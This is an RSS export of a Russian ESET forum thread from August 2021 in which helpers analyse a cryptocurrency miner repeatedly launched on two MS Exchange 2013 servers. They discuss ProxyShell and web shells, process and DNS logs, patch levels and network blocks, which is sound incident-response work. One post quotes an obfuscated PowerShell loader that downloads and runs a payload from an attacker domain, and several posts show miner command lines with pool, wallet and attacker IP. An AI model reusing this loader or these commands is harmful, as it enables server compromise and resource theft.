<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: запуск майнера на серверах с MS Exchange 2013]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме запуск майнера на серверах с MS Exchange 2013 форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Wed, 15 Apr 2026 08:01:27 +0300</pubDate>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message113001/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_1eSnoe7M" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br />Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно.<br />=============<br />а по логам DNS можете проверить, были из внутренней сети попытки подключения на заблокированные адреса? <br />
			<i>21.08.2021 13:06:49, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message113001/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message113001/</guid>
			<pubDate>Sat, 21 Aug 2021 13:06:49 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112986/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Спасибо. Сейчас буду проверять всё что ниписали. Но с того момента как заблокировал всю хетслерскую сеть, так уже вторую неделю не видим проблем. Но проверять нужно. <br />
			<i>16.08.2021 10:39:14, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112986/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112986/</guid>
			<pubDate>Mon, 16 Aug 2021 10:39:14 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112976/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_YyPQeR9t" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />+<br /> <noindex><a href="https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html" target="_blank" rel="nofollow">https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html</a></noindex> <br />=============<br /><br />здесь <B>RP55</B>, скорее прав, <br />что атака была и с этой стороны, судя по тому, что в одном из апрельских образов (на другом почт сервере), запускался такой скрипт.<br /><br />
====code====
<pre>"C:&#92;Windows&#92;system32&#92;cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global&#92;eLocalTMn',&#91;ref&#93;$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'&#92;m6.bin';$down_url='хттп://&#91;B&#93;d.hwqloan.com&#91;/B&#93;';function gmd5($con){&#91;System.Security.Cryptography.MD5&#93;::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=&#91;System.IO.File&#93;::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&#38;VMCTFH-MAIL^^^&#38;36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&#38;00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){&#91;System.IO.File&#93;::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con&#91;$i&#93; -eq 0x0a){break}};i`ex(-join&#91;char&#91;&#93;&#93;$con&#91;0..$i&#93;);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con&#91;($i+1)..($con.count)&#93;)), (&#91;IO.Compression.CompressionMode&#93;::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'&#92;m6.bin.ori';&#91;System.IO.File&#93;::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &#38;cmd /c copy /y %tmp%&#92;m6.bin.ori %tmp%&#92;m6.bin.exe &#38; %tmp%&#92;m6.bin.exe </pre>
=============
<br />но там после уст патчей все затихло сразу. те данная атака прекратилась.<br /><br />(хотя и не факт, что именно они сейчас запускают майнер) <br />
			<i>13.08.2021 10:56:20, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112976/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112976/</guid>
			<pubDate>Fri, 13 Aug 2021 10:56:20 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112975/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<B>что еще нужно проверить. </B><br /><br />судя по списку установленного ПО, у вас версия 15.0.1497.2 кумулятивного обновления<br />Microsoft Exchange Server 2013 Cumulative Update 23 <br />выпуск этого обновления был от<br />Exchange Server 2013 CU23 	18 июня 2019 г. 	15.0.1497.2 	15.00.1497.002<br /><br />после этого <br />Exchange Server 2013 CU23 	18 июня 2019 г. 	15.0.1497.2 	15.00.1497.002<br />были еще новые выпуски:<br /><br /> &nbsp; Exchange Server 2013 CU23 Jul21SU 	13 июля 2021 г. 	15.0.1497.23 	15.00.1497.023<br /> &nbsp; Exchange Server 2013 CU23 May21SU 	11 мая 2021 г. 	15.0.1497.18 	15.00.1497.018<br /> &nbsp; Exchange Server 2013 CU23 Apr21SU 	13 апреля 2021 г. 	15.0.1497.15 	15.00.1497.015<br /> &nbsp; Exchange Server 2013 CU23 Mar21SU 	2 марта 2021 г. 	15.0.1497.12 	15.00.1497.012<br /><br />возможно, <br />некорректное отображение версии обновления в списке установленного ПО,<br />а возможно,<br /> установлено неактуальное обновление для Microsoft Exchange Server 2013<br /><br /><noindex><a href="https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates" target="_blank" rel="nofollow">https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates</a></noindex> <br />
			<i>13.08.2021 09:25:41, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112975/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112975/</guid>
			<pubDate>Fri, 13 Aug 2021 09:25:41 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112974/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			возможен и такой вариант проникновения.<br /><br /><B>ProxyShell активно используется для установки веб-шеллов</B><br />В настоящее время эксплойт сбрасывает веб-оболочку размером 265 КБ в папку<B> c: \ inetpub \ wwwroot \ aspnet_client \</B>.<br />веб-оболочки состоят из простого защищенного аутентификацией сценария, который злоумышленники могут использовать для загрузки файлов на скомпрометированный сервер Microsoft Exchange.<br />злоумышленники используют первую веб-оболочку для загрузки дополнительной веб-оболочки в папку с удаленным доступом и два исполняемых файла в папки C: \ Windows \ System32<br />Если два исполняемых файла не могут быть найдены, в следующей папке будет создана другая веб-оболочка в виде файлов ASPX со случайным именем.<br /><B>C: \ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ HttpProxy \ owa \ auth \</B><br />Злоумышленники используют вторую веб-оболочку для запуска исполняемого файла (пример: createhidetask.exe), который создает запланированную задачу с именем (например:PowerManager), которая запускает исполняемый файл (например:ApplicationUpdate.exe ) в 1 час ночи каждый день.<br />исполняемый файл ApplicationUpdate.exe - это пользовательский загрузчик .NET, используемый в качестве бэкдора.<br />«ApplicationUpdate.exe - это загрузчик .NET, который загружает другой двоичный файл .NET с удаленного сервера (который в настоящее время обслуживает полезную нагрузку)<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/</a></noindex><br /><br />если смотреть по пред логам сканирования от мбам: (от 28.07)<br /><br />====quote====<br /><span class="bx-font" style="font-size:10pt; line-height: normal;">Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstar<WBR/>&shy;t.aspx.lnk, Помещено в карантин, 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F<WBR/>&shy;6597<br />Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, Помещено в карантин, 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A<WBR/>&shy;0E16<br /><br />=============<br /></span><br />+<br /><br />====quote====<br />-Информация о веб-сайте-<br />Категория: Троянская программа<br />Домен: <br />IP-адрес: 192.227.134.73<br />Порт: 443<br />Тип: Входящий трафик<br />Файл: System<br />=============<br /><br />может, стоит еще раз проверить сканированием в мбам, что он найдет в этот раз, после новых запусков. <br />
			<i>13.08.2021 05:45:21, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112974/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112974/</guid>
			<pubDate>Fri, 13 Aug 2021 05:45:21 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112957/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Владимир,<br />стоит еще выполнить поиск в сети по след. параметрам:<br />
====code====
<pre>44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX</pre>
=============
<br />возможно, это адрес кошелька<br />+<br />pool.supportxmr.com:443<br /><br />Apr 29 2021<br /><br />====quote====<br />Exchange Server Vulnerability - Still Having Issues after all Patch and CU20 Updates<br /><br />Hello everyone,<br /><br />As per Microsoft Recommendations, we already installed all security patches earlier in the March and installed CU 20 updates. Here are the details about our issues. Any help on this will be appreciated:<br /><br />Issue: High CPU utilization due to cmd.exe process<br /><br />Exchange 2016 Standard<br /><br />Work done so far:<br />All patches installed, CU 20 installed, Performed multiple scan with Microsoft Safety Scanner, every time it finds and remove &quot;Backdoor:MSIL/Chopper.F!dha &quot; but next day same issue occurs<br /><br />Opened CMD.exe file with process explorer today and found following scripts:<br />
====code====
<pre>C:&#92;Windows&#92;System32&#92;cmd.exe -o 95.216.46.125:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
</pre>
=============
<br />Also ran Exchange Mitigation Tool and it did not found anything.<br />=============<br /><br /><noindex><a href="https://docs.microsoft.com/en-us/answers/questions/376174/exchange-server-vulnerability-still-having-issues.html" target="_blank" rel="nofollow">https://docs.microsoft.com/en-us/answers/questions/376174/exchange-server-vulnerability-still-having-issues.html</a></noindex> <br />
			<i>09.08.2021 17:57:57, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112957/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112957/</guid>
			<pubDate>Mon, 09 Aug 2021 17:57:57 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112952/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_aq1JAfYi" href="/user/4688/" bx-tooltip-user-id="4688">Владимир  Шариков</a> написал:<br /> santy &nbsp;написал:1. запуск происх примерно в одно и тоже время на обоих серверах.<br /><br />я бы не сказал, 03:48:12 [2021.07.30] и 17:34:15 [2021.08.07]Цитата<br />=============<br /><br />нет, <br />имел ввиду, что когда происходит запуск какой-то день, то запуске происходят примерно в одно и то же время на обоих серверах.<br /><br />по 2021.07.30 у нас были логи только с одного сервера<br /><br />а вот 2021.08.07 есть логи от обоих серверов, и здесь видно, что время запуска примерно одинаковое<br /><br /><span class="bx-font" style="font-size:14pt; line-height: normal;">17:34:15 [2021.08.07] на  SPHVMAIL01<br />17:43:35 [2021.08.07] на  IZTVMAIL01<br /><br /></span>с другой стороны, согласен, что четкого расписания по времени нет в разные дни<br /><br />склоняюсь к версии, либо проникновение возможно в сеть, либо удаленный запуск через доступную уязвимость<br />+ имеет смысл проверить дату изменения паролей учетных записей (если не было изменений после взлома, то сменить пароли)<br />---------<br />вот опять недавно пишут про новую обнаруженную уязвимость ProxyShell<br /><br />ProxyShell - это название трех уязвимостей, которые при объединении в цепочку выполняют удаленное выполнение кода без проверки подлинности на серверах Microsoft Exchange.<br /><br />Эти связанные уязвимости используются удаленно через службу клиентского доступа (CAS) Microsoft Exchange, работающую на порту 443 в IIS.<br /><br />В атаках ProxyShell используются три связанных уязвимости:<br /><br />CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (исправлено в апреле KB5001779)<br />CVE-2021-34523 - Повышение привилегий для серверной части Exchange PowerShell (исправлено в апреле, KB5001779)<br />CVE-2021-31207 - Запись произвольного файла после авторизации приводит к RCE (исправлено в мае KB5003435)<br /><br /><noindex><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now/" target="_blank" rel="nofollow">https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now/</a></noindex><br /><br />если есть возможность, проверьте по журналам было ли вторжение в локальную сеть (проникновение &nbsp;или удаленное выполнение кода &nbsp;в данных интервалах времени<br />17:34:15 [2021.08.07] на  SPHVMAIL01<br />17:43:35 [2021.08.07] на  IZTVMAIL01<br /><br /><br />====quote====<br />Это самое сложное "В нужный момент". Я так понял что если перезаписывает лог каждый час, необходимо попасть(не спать) в этот час? &nbsp;<br />=============<br /><br />да, успеть создать образ автозапуска пока система не затерла в логах DNS нужные записи, связанные с запуском процесса.<br />в принципе, можно создать скрипт с созданием образа автозапуска из uVS, который бы сработал на запуск майнера.<br />автоматически сразу после обнаружения процесса запуска майнера. <br />(важно, чтобы отслеживание на сервере было уже включено: и процессов и DNS)<br /><B>ну, собственно прописать в скрипте:<br />"создать образ автозапуска"<br />выгрузить процесс майнера после завершения создания образа автозапуска"<br />и "отключить отслеживание".</B><br /><br />или создать задачу, которая бы с определенной периодичностью запускала скрипт,<br />скрипт сканирует список процессов<br />если находит процесс с майнером, то запускает uVS на создание образа автозапуска, после завершения выгружает процесс майнера,<br />закрывает отслеживание<br />+<br />отправляет сообщение на почту администратору.<br /><br />важно определить сколько по времени займет однократный процесс сканирования, чтобы определить с какой периодичностью можно запускать задачу. <br />
			<i>09.08.2021 13:29:25, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112952/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112952/</guid>
			<pubDate>Mon, 09 Aug 2021 13:29:25 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112951/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			Я все же думаю что эксплойт запускается с &quot;внешнего мира&quot;, т.е. есть какая то дыра, которая позволяет удаленно запускать на серваке заразу. Т.к. фаилы создаются самопроизвольно, под пользователем СИСТЕМА, и смысла нет искать на самом серваке. Если только с помощью чего запустили они этот процесс, но мы вроде как это выяснили. <br />В идеале прикрыть 443 порт, но закрыть ну не как не реально. Сейчас заблокировал хетцнерскую сеть, понаблюдаю. Думаю поможет НА ВРЕМЯ. Но дыру как отыскать... <br />
			<i>09.08.2021 12:30:48, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112951/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112951/</guid>
			<pubDate>Mon, 09 Aug 2021 12:30:48 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112950/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_O1Ub34jl" href="/user/997/" bx-tooltip-user-id="997">RP55 RP55</a> написал:<br />Вы с ним работаете ?<br />=============<br />Да. Установил на всякий случай, если вдруг удаленка по РДП будет пропадать (у нас при первой атаке так было).<br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_HJg5CP3H" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />1. запуск происх примерно в одно и тоже время на обоих серверах.<br />=============<br />я бы не сказал, 03:48:12 &#91;2021.07.30&#93; и 17:34:15 &#91;2021.08.07&#93;<br />====quote====<br /><a class="blog-p-user-name" id="bp_45v9UXBy" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />3. удаленный адрес подкл - один и тот же, повторяется при новых запусках.<br />=============<br />Заблокировал на сетевом адресе подсеть 95.216.46.0 <br /><br />====quote====<br /><a class="blog-p-user-name" id="bp_p5F6QkNx" href="/user/22/" bx-tooltip-user-id="22">santy</a> написал:<br />5. думаю, стоит еще включить лог DNS (в нужный момент), пусть пишется по 512Мб - на производительности системы не должно сказываться, после 512 &nbsp;- пойдет перезапись файла лога,<br />=============<br />Это самое сложное &quot;В нужный момент&quot;. Я так понял что если перезаписывает лог каждый час, необходимо попасть(не спать) в этот час? &nbsp; <br />
			<i>09.08.2021 11:51:25, Владимир  Шариков.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112950/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112950/</guid>
			<pubDate>Mon, 09 Aug 2021 11:51:25 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112941/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			<br />====quote====<br />DNS лог: 0<br />Отслеживание задач: 0<br />Отслеживание запуска процессов: 1<br />Отслеживание завершения процессов: 1<br />=============<br />отслеживание задач - не поддерживается для данной системы, только отсл процессов+возможно лог DNS.<br /><br />на первом сервере (Имя компьютера: IZTVMAIL01)<br /><br />====quote====<br />pid=7260 NT AUTHORITY\СИСТЕМА<br />17:43:35 [2021.08.07]<br />cmdline=C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZ<WBR/>&shy;YZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON<br />CPU 1013,99%<br /><B>parentid=13100</B> не определился, или был закрыт после запуска майнера.<br />192.168.24.26:38069 &lt;-&gt; 95.216.46.125:443<br />=============<br /><br /><br />на втором сервере (Имя компьютера: SPHVMAIL01) запуск примерно в это же время.<br /><br />====quote====<br />C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZ<WBR/>&shy;YZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON<br />17:34:15 [2021.08.07]<br />parentid=27320<br />192.168.10.26:51537 &lt;-&gt; 95.216.46.125:443<br />----------------<br />=============<br />отфильтровать процессы, которые были запущены в этом интервале - не найдено других процессов в данный промежуток времени (17:**:** [2021.08.07].<br />в WMI - чисто<br /><br />в пред. образе от 30.07<br />NT AUTHORITY\СИСТЕМА<br />C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZ<WBR/>&shy;YZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON<br />03:48:12 [2021.07.30]<br />1001,31%<br />192.168.24.26:60064 &lt;-&gt; 95.216.46.125:443 /WHOIS: country: &nbsp; &nbsp; &nbsp; &nbsp;FI/<br />----------------<br /><br />итого: <br /><B>1. запуск происх примерно в одно и тоже время на обоих серверах.</B><br />2. запуск майнера идентичный на обоих серверах<br />3. удаленный адрес подкл - один и тот же, повторяется при новых запусках.<br /><br /><br />4. нужны новые логи ESETlogCollector (с обоих серверов), чтобы выполнить поиск по журналам, есть ли инфо в журналах по процессу с pid=13100, pid=27320<br /><br />5. думаю, стоит еще включить лог DNS (в нужный момент), пусть пишется по 512Мб - на производительности системы не должно сказываться, после 512 &nbsp;- пойдет перезапись файла лога, <br />
			<i>08.08.2021 04:25:55, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112941/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112941/</guid>
			<pubDate>Sun, 08 Aug 2021 04:25:55 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum6/topic16497/message112937/">запуск майнера на серверах с MS Exchange 2013</a></b> в форуме <a href="http://forum.esetnod32.ru/forum6/">Обнаружение вредоносного кода и ложные срабатывания</a>. <br />
			В SPHVMAIL01<br />Есть: RemoteAdmin<br />Полное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE<br />Имя файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ROMSERVER.EXE<br /><br />Сохраненная информация &nbsp; &nbsp; &nbsp;на момент создания образа<br />Статус &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ПРОВЕРЕННЫЙ <br />File_Id &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 573EB6C862B000<br />Linker &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2.25<br />Размер &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5890016 байт<br />Создан &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;20.05.2016 в 10:06:30<br />Изменен &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 20.05.2016 в 10:06:30<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />TimeStamp &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 20.05.2016 в 07:03:36<br />EntryPoint &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;+<br />OS Version &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;5.0<br />Subsystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Windows graphical user interface (GUI) subsystem<br />IMAGE_FILE_DLL &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;-<br />IMAGE_FILE_EXECUTABLE_IMAGE +<br />Оригинальное имя &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ROMSERVER.EXE<br />Тип файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 32-х битный ИСПОЛНЯЕМЫЙ<br />Цифр. подпись &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Действительна, подписано Yakhnovets Denis Aleksandrovich IP<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Версия файла &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;4.7.2.0<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Доп. информация &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; на момент обновления списка<br />SHA1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;1D3A7A4B1A57192A9187D5901D38495B0F7888CB<br />MD5 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1A0C89DC5D3814C030DCAC5BD88349F9<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Ссылки на объект &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />SHORTCUT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Settings for LM-Server.lnk<br />SHORTCUT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Start LM-Server.lnk<br />SHORTCUT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Stop LM-Server.lnk<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br />Вы с ним работаете ? <br />
			<i>08.08.2021 00:48:11, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum6/topic16497/message112937/</link>
			<guid>http://forum.esetnod32.ru/messages/forum6/topic16497/message112937/</guid>
			<pubDate>Sun, 08 Aug 2021 00:48:11 +0300</pubDate>
			<category>Обнаружение вредоносного кода и ложные срабатывания</category>
		</item>
		<item>
			<title>запуск майнера на серверах с MS Exchange 2013</title>
